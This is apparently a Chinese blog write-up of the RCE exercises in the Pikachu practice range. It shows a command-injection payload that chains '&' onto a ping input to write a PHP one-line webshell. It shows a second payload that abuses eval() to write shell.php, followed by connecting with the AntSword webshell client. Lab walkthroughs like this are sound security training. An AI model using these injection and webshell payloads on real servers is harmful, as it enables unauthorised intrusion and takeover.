Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
Gofarlic_oms12 分钟前
避免Kisssoft高级分析模块过度采购的科学评估方法
大数据·linux·运维·人工智能·matlab
linux kernel3 分钟前
第七部分:高级IO
服务器·网络
田井中律.12 分钟前
服务器部署问题汇总(ubuntu24.04.3)
运维·服务器
数字护盾(和中)20 分钟前
BAS+ATT&CK:企业主动防御的黄金组合
服务器·网络·数据库
大大水瓶25 分钟前
HAProxy 从入门到实战:负载均衡与流量管理全解析
运维·负载均衡
小马爱打代码28 分钟前
Docker:完全指南从入门到精通
运维·docker·容器
web3.088899931 分钟前
获得某红书笔记评论说明-item_review
服务器·前端·数据库
linux kernel37 分钟前
第十一部分(下):进程通信
linux·服务器
一名优秀的码农1 小时前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking1 小时前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全